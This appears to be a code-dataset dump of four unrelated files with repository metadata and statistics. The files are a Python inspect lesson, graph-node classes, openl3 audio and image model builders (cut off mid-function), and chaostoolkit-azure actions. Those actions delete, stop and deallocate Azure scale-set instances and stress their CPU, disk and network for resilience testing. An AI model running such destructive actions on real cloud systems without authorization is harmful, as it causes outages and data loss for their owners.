2022-03-21T12:31:58.000Z
src/lesson_language_tools/inspect_getmembers_class_methods_b.py
jasonwee/asus-rt-n14uhp-mrtg
4fa96c3406e32ea6631ce447db6d19d70b2cd061
[ "Apache-2.0" ]
null
null
null
src/lesson_language_tools/inspect_getmembers_class_methods_b.py
jasonwee/asus-rt-n14uhp-mrtg
4fa96c3406e32ea6631ce447db6d19d70b2cd061
[ "Apache-2.0" ]
null
null
null
import inspect from pprint import pprint import example pprint(inspect.getmembers(example.B, inspect.isfunction))
16.571429
57
0.827586
15
116
6.4
0.533333
0.25
0
0
0
0
0
0
0
0
0
0
0.103448
116
6
58
19.333333
0.923077
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0.5
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
6
7d21f867d2deccb1e25471e24c6a68d3e5b9b0df
1,317
py
Python
no.py
rodrigondec/Grafos
dd3bb7ffd56909395cc211c6d68f9e3eaa5fa9ba
[ "Unlicense" ]
null
null
null
no.py
rodrigondec/Grafos
dd3bb7ffd56909395cc211c6d68f9e3eaa5fa9ba
[ "Unlicense" ]
null
null
null
no.py
rodrigondec/Grafos
dd3bb7ffd56909395cc211c6d68f9e3eaa5fa9ba
[ "Unlicense" ]
null
null
null
class No(object): """docstring for ClassName""" def __init__(self, identificador): super(No, self).__init__() self.identificador = identificador def __str__(self): return '['+self.identificador.__str__()+']' def str(self): return '['+self.identificador.__str__()+']' class NoValorado(No): """docstring for NoValued""" def __init__(self, identificador, valor): No.__init__(self, identificador) self.valor = valor def __str__(self): return '['+self.identificador.__str__()+'] {'+self.valor.__str__()+'}' def str(self): return '['+self.identificador.__str__()+'] {'+self.valor.__str__()+'}' class NoArvore(No): def __init__(self, identificador, pai): No.__init__(self, identificador) self.pai = pai def __str__(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'}' def str(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'}' class NoArvoreDist(NoArvore): def __init__(self, identificador, pai, distancia): NoArvore.__init__(self, identificador, pai) self.distancia = distancia def __str__(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'} ('+self.distancia.__str__()+')' def str(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'} ('+self.distancia.__str__()+')'
27.4375
101
0.677297
147
1,317
5.306122
0.136054
0.348718
0.215385
0.164103
0.630769
0.492308
0.492308
0.45
0.4
0.4
0
0
0.116932
1,317
47
102
28.021277
0.670679
0.034928
0
0.5625
0
0
0.031746
0
0
0
0
0
0
1
0.375
false
0
0
0.25
0.75
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
7d385a88c1c424fa3e161db98687f83cfbd9f5da
17,171
py
Python
chaosazure/vmss/actions.py
chaostoolkit-incubator/chaostoolkit-azure
377a35651d999281379b49ceb406061649840d3f
[ "Apache-2.0" ]
23
2018-10-17T14:38:08.000Z
2022-02-23T13:21:30.000Z
chaosazure/vmss/actions.py
saibaldas/chaostoolkit-azure
7ac0ef4406c9f58375f507ad536777e4b3e045e0
[ "Apache-2.0" ]
116
2018-06-19T13:48:28.000Z
2022-03-24T08:59:19.000Z
chaosazure/vmss/actions.py
saibaldas/chaostoolkit-azure
7ac0ef4406c9f58375f507ad536777e4b3e045e0
[ "Apache-2.0" ]
31
2018-10-01T11:07:06.000Z
2022-03-24T17:06:08.000Z
from typing import Iterable, Mapping from chaoslib import Configuration, Secrets from logzero import logger from chaosazure import init_compute_management_client from chaosazure.common import cleanse from chaosazure.common.compute import command from chaosazure.vmss.fetcher import fetch_vmss, fetch_instances from chaosazure.vmss.records import Records __all__ = [ "delete_vmss", "restart_vmss", "stop_vmss", "deallocate_vmss", "burn_io", "fill_disk", "network_latency", "stress_vmss_instance_cpu" ] def delete_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Delete a virtual machine scale set instance at random. **Be aware**: Deleting a VMSS instance is an invasive action. You will not be able to recover the VMSS instance once you deleted it. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' """ logger.debug( "Starting delete_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Deleting instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_delete( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def restart_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Restart a virtual machine scale set instance at random. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' """ logger.debug( "Starting restart_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Restarting instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_restart( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def stop_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Stops instances from the filtered scale set either at random or by a defined instance criteria. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' instance_criteria : Iterable[Mapping[str, any]] Allows specification of criteria for selection of a given virtual machine scale set instance. If the instance_criteria is omitted, an instance will be chosen at random. All of the criteria within each item of the Iterable must match, i.e. AND logic is applied. The first item with all matching criterion will be used to select the instance. Criteria example: [ {"name": "myVMSSInstance1"}, { "name": "myVMSSInstance2", "instanceId": "2" } {"instanceId": "3"}, ] If the instances include two items. One with name = myVMSSInstance4 and instanceId = 2. The other with name = myVMSSInstance2 and instanceId = 3. The criteria {"instanceId": "3"} will be the first match since both the name and the instanceId did not match on the first criteria. """ logger.debug( "Starting stop_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Stopping instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_power_off( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def deallocate_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Deallocate a virtual machine scale set instance at random. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' """ logger.debug( "Starting deallocate_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Deallocating instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_deallocate( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def stress_vmss_instance_cpu( filter: str = None, duration: int = 120, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): logger.warning( "Deprecated usage of activity 'stress_vmss_instance_cpu'." " Please use activity 'stress_cpu' in favor since this" " activity will be removed in a future release.") return stress_cpu( filter, duration, timeout, instance_criteria, configuration, secrets) def stress_cpu(filter: str = None, duration: int = 120, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Stresses the CPU of a random VMSS instances in your selected VMSS. Similar to the stress_cpu action of the machine.actions module. Parameters ---------- filter : str, optional Filter the VMSS. If the filter is omitted all VMSS in the subscription will be selected as potential chaos candidates. duration : int, optional Duration of the stress test (in seconds) that generates high CPU usage. Defaults to 120 seconds. timeout : int Additional wait time (in seconds) for stress operation to be completed. Getting and sending data from/to Azure may take some time so it's not recommended to set this value to less than 30s. Defaults to 60 seconds. """ logger.debug( "Starting stress_vmss_instance_cpu:" " configuration='{}', filter='{}'," " duration='{}', timeout='{}'".format( configuration, filter, duration, timeout)) vmss_records = Records() vmss = fetch_vmss(filter, configuration, secrets) for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare(instance, 'cpu_stress_test') parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration} ] } logger.debug( "Stressing CPU of VMSS instance: '{}'".format( instance['instance_id'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def burn_io(filter: str = None, duration: int = 60, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Increases the Disk I/O operations per second of the VMSS machine. Similar to the burn_io action of the machine.actions module. """ logger.debug( "Starting burn_io: configuration='{}', filter='{}', duration='{}'," " timeout='{}'".format(configuration, filter, duration, timeout)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare(instance, 'burn_io') parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration} ] } logger.debug( "Burning IO of VMSS instance: '{}'".format(instance['name'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def fill_disk(filter: str = None, duration: int = 120, timeout: int = 60, size: int = 1000, path: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Fill the VMSS machine disk with random data. Similar to the fill_disk action of the machine.actions module. """ logger.debug( "Starting fill_disk: configuration='{}', filter='{}'," " duration='{}', size='{}', path='{}', timeout='{}'".format( configuration, filter, duration, size, path, timeout)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare(instance, 'fill_disk') fill_path = command.prepare_path(instance, path) parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration}, {'name': "size", 'value': size}, {'name': "path", 'value': fill_path} ] } logger.debug( "Filling disk of VMSS instance: '{}'".format( instance['name'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def network_latency(filter: str = None, duration: int = 60, delay: int = 200, jitter: int = 50, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Increases the response time of the virtual machine. Similar to the network_latency action of the machine.actions module. """ logger.debug( "Starting network_latency: configuration='{}', filter='{}'," " duration='{}', delay='{}', jitter='{}', timeout='{}'".format( configuration, filter, duration, delay, jitter, timeout)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare( instance, 'network_latency') parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration}, {'name': "delay", 'value': delay}, {'name': "jitter", 'value': jitter} ] } logger.debug( "Increasing the latency of VMSS instance: '{}'".format( instance['name'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources')
39.203196
79
0.600489
1,714
17,171
5.855309
0.124854
0.045436
0.030291
0.033479
0.754085
0.74711
0.713033
0.713033
0.709147
0.690315
0
0.004026
0.30569
17,171
437
80
39.292906
0.837779
0.205288
0
0.717857
0
0
0.133338
0.005741
0
0
0
0
0
1
0.032143
false
0
0.028571
0
0.092857
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
adb3678b9743e6f37eb71a8b7d1ffb7c03bef60e
111
py
Python
python/testData/multipleArgumentsCompletion/slashAndSingleStarParameter.after.py
06needhamt/intellij-community
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
[ "Apache-2.0" ]
null
null
null
python/testData/multipleArgumentsCompletion/slashAndSingleStarParameter.after.py
06needhamt/intellij-community
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
[ "Apache-2.0" ]
null
null
null
python/testData/multipleArgumentsCompletion/slashAndSingleStarParameter.after.py
06needhamt/intellij-community
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
[ "Apache-2.0" ]
null
null
null
def foo(a, /, b, *, c): print(a, b, c) def egg(): a = 1 b = 2 c = 3 foo(a, b, c=c)<caret>
12.333333
25
0.369369
23
111
1.782609
0.478261
0.146341
0.219512
0.292683
0
0
0
0
0
0
0
0.044776
0.396396
111
9
25
12.333333
0.567164
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0.142857
1
0
1
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
add698633fee311bc61e52df21ecee850389418e
45
py
Python
apps/utils/__init__.py
crisariasgg/RepinSolution
27e9b04ccc887b4300d77dda8657e761f9523123
[ "MIT" ]
null
null
null
apps/utils/__init__.py
crisariasgg/RepinSolution
27e9b04ccc887b4300d77dda8657e761f9523123
[ "MIT" ]
null
null
null
apps/utils/__init__.py
crisariasgg/RepinSolution
27e9b04ccc887b4300d77dda8657e761f9523123
[ "MIT" ]
1
2021-12-09T21:27:35.000Z
2021-12-09T21:27:35.000Z
from .shopify_upload_product_utility import *
45
45
0.888889
6
45
6.166667
1
0
0
0
0
0
0
0
0
0
0
0
0.066667
45
1
45
45
0.880952
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
bc07c2ed6f9406dbf21fcdfb091574d77c7aabde
23,945
py
Python
openl3/models.py
lclichen/openl3
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
[ "MIT" ]
279
2018-11-14T21:37:16.000Z
2022-03-25T09:18:32.000Z
openl3/models.py
lclichen/openl3
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
[ "MIT" ]
76
2018-10-31T18:13:11.000Z
2022-02-09T22:44:41.000Z
openl3/models.py
lclichen/openl3
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
[ "MIT" ]
45
2018-11-14T21:44:21.000Z
2022-03-29T09:38:30.000Z
import os import warnings import sklearn.decomposition import numpy as np from .openl3_exceptions import OpenL3Error with warnings.catch_warnings(): # Suppress TF and Keras warnings when importing warnings.simplefilter("ignore") import tensorflow as tf import tensorflow.keras.backend as K from tensorflow.keras import Model from tensorflow.keras.layers import ( Input, Conv2D, Permute, BatchNormalization, MaxPooling2D, Flatten, Activation, Lambda) import tensorflow.keras.regularizers as regularizers VALID_FRONTENDS = ("librosa", "kapre") VALID_INPUT_REPRS = ("linear", "mel128", "mel256") VALID_CONTENT_TYPES = ("music", "env") VALID_AUDIO_EMBEDDING_SIZES = (6144, 512) VALID_IMAGE_EMBEDDING_SIZES = (8192, 512) def _log10(x): '''log10 tensorflow function.''' return tf.math.log(x) / tf.math.log(tf.constant(10, dtype=x.dtype)) def kapre_v0_1_4_magnitude_to_decibel(x, ref_value=1.0, amin=1e-10, dynamic_range=80.0): '''log10 tensorflow function.''' amin = tf.cast(amin or 1e-10, dtype=x.dtype) max_axis = tuple(range(K.ndim(x))[1:]) or None log_spec = 10. * _log10(K.maximum(x, amin)) return K.maximum( log_spec - K.max(log_spec, axis=max_axis, keepdims=True), -dynamic_range) def __fix_kapre_spec(func): '''Wraps the kapre composite layer interface to revert .''' def get_spectrogram(*a, return_decibel=False, **kw): seq = func(*a, return_decibel=False, **kw) if return_decibel: seq.add(Lambda(kapre_v0_1_4_magnitude_to_decibel)) seq.add(Permute((2, 1, 3))) # the output is (None, t, f, ch) instead of (None, f, t, ch), so gotta fix that return seq return get_spectrogram def _validate_audio_frontend(frontend='kapre', input_repr=None, model=None): '''Make sure that the audio frontend matches the model and input_repr.''' ndims = len(model.input_shape) if model is not None else None # if frontend == 'infer': # detect which frontend to use # if model is None: # default # frontend = 'kapre' # elif ndims == 3: # shape: [batch, channel, samples] # frontend = 'kapre' # elif ndims == 4: # shape: [batch, frequency, time, channel] # frontend = 'librosa' # else: # raise OpenL3Error( # 'Invalid model input shape: {}. Expected a model ' # 'with either a 3 or 4 dimensional input, got {}.'.format(model.input_shape, ndims)) if frontend not in VALID_FRONTENDS: raise OpenL3Error('Invalid frontend "{}". Must be one of {}'.format(frontend, VALID_FRONTENDS)) # validate that our model shape matches our frontend. if ndims is not None: if frontend == 'kapre' and ndims != 3: raise OpenL3Error('Invalid model input shape: {}. Expected 3 dims got {}.'.format(model.input_shape, ndims)) if frontend == 'librosa' and ndims != 4: raise OpenL3Error('Invalid model input shape: {}. Expected 4 dims got {}.'.format(model.input_shape, ndims)) if input_repr is None: if frontend == 'librosa': raise OpenL3Error('You must specify input_repr for a librosa frontend.') else: input_repr = 'mel256' if str(input_repr) not in VALID_INPUT_REPRS: raise OpenL3Error('Invalid input representation "{}". Must be one of {}'.format(input_repr, VALID_INPUT_REPRS)) return frontend, input_repr AUDIO_POOLING_SIZES = { 'linear': { 6144: (8, 8), 512: (32, 24), }, 'mel128': { 6144: (4, 8), 512: (16, 24), }, 'mel256': { 6144: (8, 8), 512: (32, 24), } } IMAGE_POOLING_SIZES = { 8192: (7, 7), 512: (28, 28), } def load_audio_embedding_model(input_repr, content_type, embedding_size, frontend='kapre'): """ Returns a model with the given characteristics. Loads the model if the model has not been loaded yet. Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. content_type : "music" or "env" Type of content used to train embedding. embedding_size : 6144 or 512 Embedding dimensionality. frontend : "kapre" or "librosa" The audio frontend to use. If frontend == 'kapre', then the kapre frontend will be included. Otherwise no frontend will be added inside the keras model. Returns ------- model : tf.keras.Model Model object. """ model_path = get_audio_embedding_model_path(input_repr, content_type) return load_audio_embedding_model_from_path(model_path, input_repr, embedding_size, frontend=frontend) def load_audio_embedding_model_from_path(model_path, input_repr, embedding_size, frontend='kapre'): """ Loads a model with weights at the given path. Parameters ---------- model_path : str Path to model weights HDF5 (.h5) file. Must be in format `*._<input_repr>_<content_type>.h5` or `*._<input_repr>_<content_type>-.*.h5`, since model configuration will be determined from the filename. input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. embedding_size : 6144 or 512 Embedding dimensionality. frontend : "kapre" or "librosa" The audio frontend to use. If frontend == 'kapre', then the kapre frontend will be included. Otherwise no frontend will be added inside the keras model. Returns ------- model : tf.keras.Model Model object. """ frontend, input_repr = _validate_audio_frontend(frontend, input_repr) # Construct embedding model and load model weights with warnings.catch_warnings(): warnings.simplefilter("ignore") m = AUDIO_MODELS[input_repr](include_frontend=frontend == 'kapre') m.load_weights(model_path) # Pooling for final output embedding size pool_size = AUDIO_POOLING_SIZES[input_repr][embedding_size] y_a = MaxPooling2D(pool_size=pool_size, padding='same')(m.output) y_a = Flatten()(y_a) m = Model(inputs=m.input, outputs=y_a) m.frontend = frontend return m def get_audio_embedding_model_path(input_repr, content_type): """ Returns the local path to the model weights file for the model with the given characteristics Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for model. content_type : "music" or "env" Type of content used to train embedding. Returns ------- output_path : str Path to given model object """ return os.path.join(os.path.dirname(__file__), 'openl3_audio_{}_{}.h5'.format(input_repr, content_type)) def load_image_embedding_model(input_repr, content_type, embedding_size): """ Returns a model with the given characteristics. Loads the model if the model has not been loaded yet. Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. content_type : "music" or "env" Type of content used to train embedding. embedding_size : 8192 or 512 Embedding dimensionality. Returns ------- model : tf.keras.Model Model object. """ model_path = get_image_embedding_model_path(input_repr, content_type) return load_image_embedding_model_from_path(model_path, embedding_size) def load_image_embedding_model_from_path(model_path, embedding_size): """ Loads a model with weights at the given path. Parameters ---------- model_path : str Path to model weights HDF5 (.h5) file. embedding_size : 6144 or 512 Embedding dimensionality. input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. content_type : "music" or "env" Type of content used to train embedding. embedding_size : 8192 or 512 Embedding dimensionality. Returns ------- model : tf.keras.Model Model object. """ # Construct embedding model and load model weights with warnings.catch_warnings(): warnings.simplefilter("ignore") m = _construct_image_network() m.load_weights(model_path) # Pooling for final output embedding size pool_size = IMAGE_POOLING_SIZES[embedding_size] y_i = MaxPooling2D(pool_size=pool_size, padding='same')(m.output) y_i = Flatten()(y_i) m = Model(inputs=m.input, outputs=y_i) return m def get_image_embedding_model_path(input_repr, content_type): """ Returns the local path to the model weights file for the model with the given characteristics Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for model. content_type : "music" or "env" Type of content used to train embedding. Returns ------- output_path : str Path to given model object """ return os.path.join(os.path.dirname(__file__), 'openl3_image_{}_{}.h5'.format(input_repr, content_type)) def _construct_linear_audio_network(include_frontend=True): """ Returns an uninitialized model object for an audio network with a linear spectrogram input (With 257 frequency bins) Returns ------- model : tf.keras.Model Model object. """ weight_decay = 1e-5 n_dft = 512 n_hop = 242 asr = 48000 audio_window_dur = 1 if include_frontend: # INPUT input_shape = (1, asr * audio_window_dur) x_a = Input(shape=input_shape, dtype='float32') # SPECTROGRAM PREPROCESSING # 257 x 197 x 1 from kapre.composed import get_stft_magnitude_layer spec = __fix_kapre_spec(get_stft_magnitude_layer)( input_shape=input_shape, n_fft=n_dft, hop_length=n_hop, return_decibel=True, input_data_format='channels_first', output_data_format='channels_last') y_a = spec(x_a) else: # NOTE: asr - n_dft because we're not padding (I think?) input_shape = (n_dft // 2 + 1, int(np.ceil((asr - n_dft) * audio_window_dur / n_hop)), 1) x_a = y_a = Input(shape=input_shape, dtype='float32') y_a = BatchNormalization()(y_a) # CONV BLOCK 1 n_filter_a_1 = 64 filt_size_a_1 = (3, 3) pool_size_a_1 = (2, 2) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_1, strides=2)(y_a) # CONV BLOCK 2 n_filter_a_2 = 128 filt_size_a_2 = (3, 3) pool_size_a_2 = (2, 2) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_2, strides=2)(y_a) # CONV BLOCK 3 n_filter_a_3 = 256 filt_size_a_3 = (3, 3) pool_size_a_3 = (2, 2) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_3, strides=2)(y_a) # CONV BLOCK 4 n_filter_a_4 = 512 filt_size_a_4 = (3, 3) y_a = Conv2D(n_filter_a_4, filt_size_a_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_4, filt_size_a_4, kernel_initializer='he_normal', name='audio_embedding_layer', padding='same', kernel_regularizer=regularizers.l2(weight_decay))(y_a) m = Model(inputs=x_a, outputs=y_a) return m def _construct_mel128_audio_network(include_frontend=True): """ Returns an uninitialized model object for an audio network with a Mel spectrogram input (with 128 frequency bins). Returns ------- model : tf.keras.Model Model object. """ weight_decay = 1e-5 n_dft = 2048 n_mels = 128 n_hop = 242 asr = 48000 audio_window_dur = 1 if include_frontend: # INPUT input_shape = (1, asr * audio_window_dur) x_a = Input(shape=input_shape, dtype='float32') # MELSPECTROGRAM PREPROCESSING # 128 x 199 x 1 from kapre.composed import get_melspectrogram_layer spec = __fix_kapre_spec(get_melspectrogram_layer)( input_shape=input_shape, n_fft=n_dft, hop_length=n_hop, n_mels=n_mels, sample_rate=asr, return_decibel=True, pad_end=True, input_data_format='channels_first', output_data_format='channels_last') y_a = spec(x_a) else: input_shape = (n_mels, int(np.ceil(asr * audio_window_dur / n_hop)), 1) x_a = y_a = Input(shape=input_shape, dtype='float32') y_a = BatchNormalization()(y_a) # CONV BLOCK 1 n_filter_a_1 = 64 filt_size_a_1 = (3, 3) pool_size_a_1 = (2, 2) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_1, strides=2)(y_a) # CONV BLOCK 2 n_filter_a_2 = 128 filt_size_a_2 = (3, 3) pool_size_a_2 = (2, 2) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_2, strides=2)(y_a) # CONV BLOCK 3 n_filter_a_3 = 256 filt_size_a_3 = (3, 3) pool_size_a_3 = (2, 2) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_3, strides=2)(y_a) # CONV BLOCK 4 n_filter_a_4 = 512 filt_size_a_4 = (3, 3) pool_size_a_4 = (16, 24) y_a = Conv2D(n_filter_a_4, filt_size_a_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) 